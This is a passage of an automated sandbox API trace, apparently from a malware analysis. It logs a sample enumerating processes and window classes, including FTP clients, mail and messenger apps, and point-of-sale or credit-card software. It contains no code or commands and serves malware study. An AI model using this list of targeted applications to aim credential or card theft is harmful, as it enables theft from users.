th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="whosefirmthe.exe")) returned 1 [0157.913] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="seat_raise_join.exe")) returned 1 [0157.915] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="formerbuildpresent.exe")) returned 1 [0157.917] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x990, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="unittype.exe")) returned 1 [0157.919] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x998, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="allow.exe")) returned 1 [0157.920] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="rate.exe")) returned 1 [0157.921] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="pushweight.exe")) returned 1 [0157.923] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="film.exe")) returned 1 [0157.924] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="dead.exe")) returned 1 [0157.927] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="than.exe")) returned 1 [0157.997] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0157.999] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0158.002] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0158.005] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0158.009] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0158.011] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0158.013] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0158.016] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0158.018] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0158.021] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0158.024] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0158.027] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0181.737] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbcc [0181.748] Process32First (in: hSnapshot=0xbcc, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.787] Process32First (in: hSnapshot=0x14c0, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.082] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1504 [0240.096] Process32First (in: hSnapshot=0x1504, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.222] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x228 [0261.234] Process32First (in: hSnapshot=0x228, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.169] Process32First (in: hSnapshot=0xbcc, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 Thread: id = 107 os_tid = 0xef4 [0157.086] EnumWindows (lpEnumFunc=0x2593dd0, lParam=0x2580000) returned 1 [0157.086] GetClassNameA (in: hWnd=0x30122, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="TaskSwitcherWnd") returned 15 [0157.086] GetClassNameA (in: hWnd=0x400a8, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.086] GetClassNameA (in: hWnd=0x300e2, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.086] GetClassNameA (in: hWnd=0x400b6, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.086] GetClassNameA (in: hWnd=0x101ce, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="SysFader") returned 8 [0157.086] GetClassNameA (in: hWnd=0x1012a, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="ATL:000007FEF43852C0") returned 20 [0157.086] GetClassNameA (in: hWnd=0x10070, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.087] GetClassNameA (in: hWnd=0x1006e, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.087] GetClassNameA (in: hWnd=0x1005a, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.087] GetClassNameA (in: hWnd=0x10086, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.087] GetClassNameA (in: hWnd=0x10078, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.087] GetClassNameA (in: hWnd=0x10076, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.087] GetClassNameA (in: hWnd=0x10072, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.087] GetClassNameA (in: hWnd=0x10052, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="Button") returned 6 [0157.087] GetClassNameA (in: hWnd=0x1004e, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0157.087] GetClassNameA (in: hWnd=0x100ee, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.087] GetClassNameA (in: hWnd=0x50092, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.087] GetClassNameA (in: hWnd=0x10088, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0157.087] GetClassNameA (in: hWnd=0x102a2, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="Feelapp") returned 7 [0157.087] GetClassNameA (in: hWnd=0x5014a, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0157.087] GetClassNameA (in: hWnd=0x8009c, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0157.087] GetClassNameA (in: hWnd=0x102b0, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="edcsvr_win") returned 10 [0157.087] GetClassNameA (in: hWnd=0x102ae, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="fpos_wnd") returned 8 [0157.087] GetClassNameA (in: hWnd=0x102ac, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="isspos_cls") returned 10 [0157.087] GetClassNameA (in: hWnd=0x102aa, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="mxslipstream") returned 12 [0157.087] GetClassNameA (in: hWnd=0x102a8, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="omniposcls") returned 10 [0157.087] GetClassNameA (in: hWnd=0x102a6, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="spcwinapp") returned 9 [0157.087] GetClassNameA (in: hWnd=0x102a4, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="spgagentserviceclass") returned 20 [0157.088] GetClassNameA (in: hWnd=0x300bc, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.088] GetClassNameA (in: hWnd=0x400c6, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="AUTHUI.DLL: Shutdown Choices Message Window") returned 43 [0157.088] GetClassNameA (in: hWnd=0x400e4, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="_SearchEditBoxFakeWindow") returned 24 [0157.088] GetClassNameA (in: hWnd=0x300d4, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.088] GetClassNameA (in: hWnd=0x300c0, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.088] GetClassNameA (in: hWnd=0x400ba, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.088] GetClassNameA (in: hWnd=0x300a2, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="Desktop User Picture") returned 20 [0157.088] GetClassNameA (in: hWnd=0x102a0, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="creditservice_") returned 14 [0157.088] GetClassNameA (in: hWnd=0x1029e, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="centralcreditcardclass") returned 22 [0157.088] GetClassNameA (in: hWnd=0x1029c, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="ccv_serverwindow") returned 16 [0157.088] GetClassNameA (in: hWnd=0x1029a, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="leechftpwindow") returned 14 [0157.088] GetClassNameA (in: hWnd=0x10298, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="icqwnd") returned 6 [0157.088] GetClassNameA (in: hWnd=0x10296, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="gmailnotifierpro_cls") returned 20 [0157.088] GetClassNameA (in: hWnd=0x10294, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="flingapp") returned 8 [0157.088] GetClassNameA (in: hWnd=0x10292, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="foxmailincmailclass") returned 19 [0157.089] GetClassNameA (in: hWnd=0x10290, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="flashfxp_") returned 9 [0157.089] GetClassNameA (in: hWnd=0x1028e, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="filezilla_window") returned 16 [0157.089] GetClassNameA (in: hWnd=0x1028c, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="farwin") returned 6 [0157.089] GetClassNameA (in: hWnd=0x1028a, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="coreftpcls") returned 10 [0157.089] GetClassNameA (in: hWnd=0x10288, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="bitkinex_cls") returned 12 [0157.089] GetClassNameA (in: hWnd=0x10286, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="barcawindow") returned 11 [0157.089] GetClassNameA (in: hWnd=0x10284, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="alftpclass") returned 10 [0157.089] GetClassNameA (in: hWnd=0x5025c, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="absolutetelnetcls") returned 17 [0157.089] GetClassNameA (in: hWnd=0x10238, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="aldelo_win") returned 10 [0157.089] GetClassNameA (in: hWnd=0x10264, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="3dftp_win") returned 9 [0157.089] GetClassNameA (in: hWnd=0x10258, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="active-chargeclass") returned 18 [0157.089] GetClassNameA (in: hWnd=0x1025a, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="accupos_class") returned 13 [0157.089] GetClassNameA (in: hWnd=0x1023a, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="smartftpwin") returned 11 [0157.089] GetClassNameA (in: hWnd=0x10256, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="yahoomessenger_win") returned 18 [0157.089] GetClassNameA (in: hWnd=0x10254, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="winscpwin") returned 9 [0157.089] GetClassNameA (in: hWnd=0x10252, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="whatsappcls") returned 11 [0157.089] GetClassNameA (in: hWnd=0x10250, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="webdrive_wnd") returned 12 [0157.089] GetClassNameA (in: hWnd=0x1024e, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="trillianclass") returned 13 [0157.089] GetClassNameA (in: hWnd=0x1024c, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="thunderbirdwnd") returned 14 [0157.090] GetClassNameA (in: hWnd=0x1024a, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="skype_") returned 6 [0157.090] GetClassNameA (in: hWnd=0x10248, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="scriptftp_") returned 10 [0157.090] GetClassNameA (in: hWnd=0x10246, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="operamailclass") returned 14 [0157.090] GetClassNameA (in: hWnd=0x10244, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="notepadapp") returned 10 [0157.090] GetClassNameA (in: hWnd=0x10242, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="ncftp_window") returned 12 [0157.090] GetClassNameA (in: hWnd=0x10240, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="ThroughRecognize") returned 16 [0157.090] GetClassNameA (in: hWnd=0x1023e, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="outlook") returned 7 [0157.090] GetClassNameA (in: hWnd=0x10236, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="utg2_cls") returned 8 [0157.090] GetClassNameA (in: hWnd=0x1023c, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="afr38_wnd") returned 9 [0157.090] GetClassNameA (in: hWnd=0x2021c, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="Deadwnd") returned 7 [0157.090] GetClassNameA (in: hWnd=0x10232, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="than_wnd") returned 8 [0157.090] GetClassNameA (in: hWnd=0x10234, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="pidginwnd") returned 9 [0157.090] GetClassNameA (in: hWnd=0x1021a, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="whosefirmThewin") returned 15 [0157.090] GetClassNameA (in: hWnd=0x10206, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="schoolforcls") returned 12 [0157.090] GetClassNameA (in: hWnd=0x10218, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="SeatraiseJoinwindow") returned 19 [0157.090] GetClassNameA (in: hWnd=0x10216, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="former_Build_present_app") returned 24 [0157.090] GetClassNameA (in: hWnd=0x10214, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="unit_Type_") returned 10 [0157.090] GetClassNameA (in: hWnd=0x10212, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="allow_app") returned 9 [0157.090] GetClassNameA (in: hWnd=0x10210, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="Rate_app") returned 8 [0157.090] GetClassNameA (in: hWnd=0x1020e, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="Push_weight_wnd") returned 15 [0157.091] GetClassNameA (in: hWnd=0x1020c, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="film_class") returned 10 [0157.091] GetClassNameA (in: hWnd=0x101fe, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="Or_Finger_window") returned 16 [0157.091] GetClassNameA (in: hWnd=0x10204, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="Travel_imagine_recently_wnd") returned 27 [0157.091] GetClassNameA (in: hWnd=0x101f6, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="Court_camera_cls") returned 16 [0157.091] GetClassNameA (in: hWnd=0x101f8, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="suffer_Exist_Rich_") returned 18 [0157.091] GetClassNameA (in: hWnd=0x201f0, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="Or_level_cls") returned 12 [0157.091] GetClassNameA (in: hWnd=0x201f2, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="Have_Return_physical_cls") returned 24 [0157.091] GetClassNameA (in: hWnd=0x101ee, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0157.091] GetClassNameA (in: hWnd=0x101aa, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.091] GetClassNameA (in: hWnd=0x1019e, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.091] GetClassNameA (in: hWnd=0x10182, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.091] GetClassNameA (in: hWnd=0x10180, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.091] GetClassNameA (in: hWnd=0x1017a, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.091] GetClassNameA (in: hWnd=0x10170, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.091] GetClassNameA (in: hWnd=0x1016e, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.091] GetClassNameA (in: hWnd=0x10152, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IEFrame") returned 7 [0157.091] GetClassNameA (in: hWnd=0x201e8, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0157.091] GetClassNameA (in: hWnd=0x101e6, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="TabThumbnailWindow") returned 18 [0157.091] GetClassNameA (in: hWnd=0x201e2, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0157.091] GetClassNameA (in: hWnd=0x101d6, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="ATL:733658F8") returned 12 [0157.092] GetClassNameA (in: hWnd=0x101bc, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0157.092] GetClassNameA (in: hWnd=0x101b0, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0157.092] GetClassNameA (in: hWnd=0x2018a, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0157.092] GetClassNameA (in: hWnd=0x101a6, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0157.092] GetClassNameA (in: hWnd=0x10158, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0157.092] GetClassNameA (in: hWnd=0x10154, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0157.092] GetClassNameA (in: hWnd=0x10150, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0157.092] GetClassNameA (in: hWnd=0x20140, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="FaxMonWinClass{3FD224BA-8556-47fb-B260-3E451BAE2793}") returned 52 [0157.092] GetClassNameA (in: hWnd=0x10134, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0157.092] GetClassNameA (in: hWnd=0x10132, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0157.092] GetClassNameA (in: hWnd=0x20128, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="PNIHiddenWnd") returned 12 [0157.092] GetClassNameA (in: hWnd=0x1011c, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="Media Center SSO") returned 16 [0157.092] GetClassNameA (in: hWnd=0x10114, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="ATL:000007FEFBCD41F0") returned 20 [0157.092] GetClassNameA (in: hWnd=0x1010a, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="SystemTray_Main") returned 15 [0157.092] GetClassNameA (in: hWnd=0x10108, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0157.092] GetClassNameA (in: hWnd=0x60094, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0157.092] GetClassNameA (in: hWnd=0x10100, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0157.092] GetClassNameA (in: hWnd=0x100fa, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0157.092] GetClassNameA (in: hWnd=0x100f6, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0157.093] GetClassNameA (in: hWnd=0x5008a, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0157.093] GetClassNameA (in: hWnd=0x10080, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0157.093] GetClassNameA (in: hWnd=0x2007e, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0157.093] GetClassNameA (in: hWnd=0x10074, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.093] GetClassNameA (in: hWnd=0x10062, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0157.093] GetClassNameA (in: hWnd=0x20018, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="#43") returned 3 [0157.093] GetClassNameA (in: hWnd=0x1005e, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0157.093] GetClassNameA (in: hWnd=0x1004a, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0157.093] GetClassNameA (in: hWnd=0x10042, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0157.093] GetClassNameA (in: hWnd=0x3003e, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0157.093] GetClassNameA (in: hWnd=0x1007c, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="Dwm") returned 3 [0157.093] GetClassNameA (in: hWnd=0x2001c, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="CicLoaderWndClass") returned 17 [0157.093] GetClassNameA (in: hWnd=0x100e6, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="Progman") returned 7 [0157.093] GetClassNameA (in: hWnd=0x30124, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.093] GetClassNameA (in: hWnd=0x10050, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0157.093] GetClassNameA (in: hWnd=0x1004c, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.093] GetClassNameA (in: hWnd=0x102dc, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.093] GetClassNameA (in: hWnd=0x50146, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.093] GetClassNameA (in: hWnd=0x102ea, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0157.093] GetClassNameA (in: hWnd=0x102e8, lpClassName=0x266f7e0, nMaxCount=260 | out: lpClassName="IME") returned 3 